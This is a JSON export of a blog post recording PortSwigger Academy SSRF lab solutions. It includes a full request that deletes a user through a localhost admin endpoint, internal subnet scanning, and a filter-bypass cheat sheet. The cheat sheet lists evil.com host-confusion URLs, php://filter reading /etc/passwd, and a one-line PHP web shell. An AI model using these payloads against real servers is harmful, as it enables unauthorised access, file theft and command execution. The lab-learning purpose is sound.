{"id":345,"date":"2020-01-29T14:58:32","date_gmt":"2020-01-29T14:58:32","guid":{"rendered":"https:\/\/www.unordnung.net\/?p=345"},"modified":"2020-01-29T14:58:32","modified_gmt":"2020-01-29T14:58:32","slug":"basic-ssrf-portswigger-labs","status":"publish","type":"post","link":"https:\/\/unordnung.net\/misc\/2020\/01\/basic-ssrf-portswigger-labs\/","title":{"rendered":"Learning SSRF with Portswigger Labs"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">Basic SSRF against the local Server<\/h3>\n\n\n<p><a href=\"https:\/\/portswigger.net\/web-security\/ssrf\/lab-basic-ssrf-against-localhost\">https:\/\/portswigger.net\/web-security\/ssrf\/lab-basic-ssrf-against-localhost<\/a><\/p>\n\n\n<p>When accessing a product page, a check stock link checks the stock through an API at a URL that is sent in the request body. We just need to change that URL to localhost\/admin, where we can see the user delete links, and here is the request that deletes the user carlos:<\/p>\n\n\n<pre class=\"wp-block-preformatted\">POST \/product\/stock HTTP\/1.1<br \/>Host: ace01fca1f144b2e80096a4b00aa0058.web-security-academy.net<br \/>User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:68.0) Gecko\/20100101 Firefox\/68.0<br \/>Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8<br \/>Accept-Language: en-US,en;q=0.5<br \/>Accept-Encoding: gzip, deflate<br \/>Referer: https:\/\/ace01fca1f144b2e80096a4b00aa0058.web-security-academy.net\/product?productId=1<br \/>Content-Type: application\/x-www-form-urlencoded<br \/>Content-Length: 60<br \/>DNT: 1<br \/>Connection: close<br \/>Cookie: session=OQzPe2VCgJ9eEyxVAAO1RsYQYBBqDXj9<br \/>Upgrade-Insecure-Requests: 1<br \/><br \/>stockApi=http%3A%2F%2Flocalhost\/admin\/delete?username=carlos<\/pre>\n\n\n<h3 class=\"wp-block-heading\">Basic SSRF against another backend system<\/h3>\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" 
src=\"http:\/\/unordnung.net\/misc\/wp-content\/uploads\/2020\/01\/burp_ssrf1-1024x736.png\" alt=\"\" class=\"wp-image-349\"\/><figcaption>Intruder setup to &#8220;scan&#8221; the subnet, payload is numbers from 0-255<\/figcaption><\/figure>\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/unordnung.net\/misc\/wp-content\/uploads\/2020\/01\/burp_ssrf2.png\" alt=\"\" class=\"wp-image-350\"\/><figcaption>We found one host with HTTP status 200, that must be it<\/figcaption><\/figure>\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/unordnung.net\/misc\/wp-content\/uploads\/2020\/01\/burp_ssrf3-1024x694.png\" alt=\"\" class=\"wp-image-351\"\/><figcaption>and we got it. ez af \ud83d\ude42<\/figcaption><\/figure>\n\n\n<h3 class=\"wp-block-heading\">SSRF with blacklist-based input filter<\/h3>\n\n\n<p>Aha. This one is harder. I&#8217;m looking for bypass methodologies and trying a lot of stuff like:<\/p>\n\n\n<ul class=\"wp-block-list\"><li>Encoding the URL with hex, URL encoding, octal, base64<\/li><li>Trying delimiters: url.domain;other.domain @ $ etc.<\/li><li>data:\/\/ file:\/\/ gopher:\/\/ schemes<\/li><\/ul>\n\n\n<p>All of them got me HTTP 400:<\/p>\n\n\n<pre class=\"wp-block-preformatted\">\"External stock check blocked for security reasons\"<br \/>\"Invalid external stock check url 'Invalid URL'\"<br \/>{\"error\":\"Path must start with \/\"}<\/pre>\n\n\n<p>OK, I tried to use a domain registered to resolve to localhost; that way I could get to 127.0.0.1, but as soon as I added the directory and parameters the filter got me again.<\/p>\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" class=\"wp-image-363\" src=\"http:\/\/unordnung.net\/misc\/wp-content\/uploads\/2020\/01\/burp_ssrf4-1024x464.png\" alt=\"\" \/><\/figure>\n<p>Hah. 
I&#8217;ve got it&#8230; a little character-case change and it finally worked -.-&#8216;<\/p>\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" class=\"wp-image-368\" src=\"http:\/\/unordnung.net\/misc\/wp-content\/uploads\/2020\/01\/burp_ssrf5-1-1024x466.png\" alt=\"\" \/>\n<figcaption>finally<\/figcaption>\n<\/figure>\n<p>I should AGAIN RTFM&#8230; it would have been easy if I&#8217;d read the challenge description xD<\/p>\n<h3>Cheat Sheet<\/h3>\n<p>dict:\/\/<br \/>sftp:\/\/<br \/>ldap:\/\/ or ldaps:\/\/ or ldapi:\/\/<br \/>tftp:\/\/<br \/>gopher:\/\/<br \/>file:\/\/ \u2014 Accessing local filesystem<br \/>http:\/\/ \u2014 Accessing HTTP(s) URLs<br \/>ftp:\/\/ \u2014 Accessing FTP(s) URLs<br \/>php:\/\/ \u2014 Accessing various I\/O streams<br \/>zlib:\/\/ \u2014 Compression Streams<br \/>zip:\/\/<br \/>data:\/\/ \u2014 Data (RFC 2397)<br \/>glob:\/\/ \u2014 Find pathnames matching pattern<br \/>phar:\/\/ \u2014 PHP Archive<br \/>ssh2:\/\/ \u2014 Secure Shell 2<br \/>rar:\/\/ \u2014 RAR<br \/>expect:\/\/ \u2014 Process Interaction Streams<\/p>\n<p>\u201c;\u201d, 
\u201c\/\u201d, \u201c?\u201d, \u201c:\u201d, \u201c@\u201d, \u201c=\u201d, \u201c&amp;\u201d and \u201c#\u201d delimiters in URI schemes<\/p>\n<pre>URI = scheme:[\/\/authority]path[?query][#fragment]\nwhere the authority component divides into three <i>subcomponents<\/i>\nauthority = [userinfo@]host[:port]\n<\/pre>\n<p>http:\/\/url.domain@evil.domain<br \/>data:\/\/google.com\/plain;base64,SSBsb3ZlIFBIUAo=<br \/>data:\/\/text\/plain;base64,SSBsb3ZlIFBIUAo=google.com<br \/>0:\/\/evil$google.com<br \/>0:\/\/evil.com:80,google.com:80\/<br \/>0:\/\/evil.com:80;google.com:80\/<\/p>\n<p>php:\/\/filter\/convert.base64-encode\/resource=\/etc\/passwd<br \/>php:\/\/input&amp;cmd=ls with POST data:<\/p>\n<pre class=\"lang-php\"><code>&lt;?php shell_exec($_GET['cmd']); ?&gt;<\/code><\/pre>\n<p>data:\/\/text\/plain;base64,MTI3LjAuMC4xL2FkbWluLw===stock.weliketoshop.net<\/p>\n<p>zip:\/\/path\/to\/file.zip%23shell<\/p>\n<p>Point the DNS of your own domain to 127.0.0.1!!!<br \/>Alternative notations such as 127.1<\/p>\n<p>Mix upper- and lower-case characters!!<\/p>\n<p>xip.io<br \/>nip.io<\/p>\n<h3>Resources<\/h3>\n<ul>\n<li><a href=\"https:\/\/docs.google.com\/document\/d\/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM\/edit#heading=h.kwcnj7jh5zyy\">https:\/\/docs.google.com\/document\/d\/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM\/edit#heading=h.kwcnj7jh5zyy<\/a><\/li>\n<li><a 
href=\"https:\/\/medium.com\/secjuice\/php-ssrf-techniques-9d422cb28d51\">https:\/\/medium.com\/secjuice\/php-ssrf-techniques-9d422cb28d51<\/a><\/li>\n<li><a href=\"https:\/\/media.defcon.org\/DEF%20CON%2027\/DEF%20CON%2027%20presentations\/DEFCON-27-Ben-Sadeghipour-Owning-the-clout-through-SSRF-and-PDF-generators.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">https:\/\/media.defcon.org\/DEF%20CON%2027\/DEF%20CON%2027%20presentations\/DEFCON-27-Ben-Sadeghipour-Owning-the-clout-through-SSRF-and-PDF-generators.pdf<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/cujanovic\/SSRF-Testing\">https:\/\/github.com\/cujanovic\/SSRF-Testing<\/a><\/li>\n<li><a href=\"https:\/\/medium.com\/@Aptive\/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601\">https:\/\/medium.com\/@Aptive\/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601<\/a><\/li>\n<li><a href=\"http:\/\/webcache.googleusercontent.com\/search?q=cache:http:\/\/blog.safebuff.com\/2016\/07\/03\/SSRF-Tips\/\">http:\/\/webcache.googleusercontent.com\/search?q=cache:http:\/\/blog.safebuff.com\/2016\/07\/03\/SSRF-Tips\/<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Basic SSRF against the local Server https:\/\/portswigger.net\/web-security\/ssrf\/lab-basic-ssrf-against-localhost When accessing a product page, a check stock link checks the stock through an API on some URL. 
We just need to change the url to localhost\/admin where we can see user delete links and here we go with the request to delete that carlos: POST \/product\/stock HTTP\/1.1 &#8230; <a title=\"Learning SSRF with Portswigger Labs\" class=\"read-more\" href=\"https:\/\/unordnung.net\/misc\/2020\/01\/basic-ssrf-portswigger-labs\/\">Read more<span class=\"screen-reader-text\">Learning SSRF with Portswigger Labs<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":393,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[29,37,43,68],"class_list":["post-345","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-to_remember","tag-hacking","tag-infosec","tag-learning","tag-ssrf"],"_links":{"self":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts\/345","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/comments?post=345"}],"version-history":[{"count":0,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts\/345\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/media?parent=345"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/categories?post=345"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/tags?post=345"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}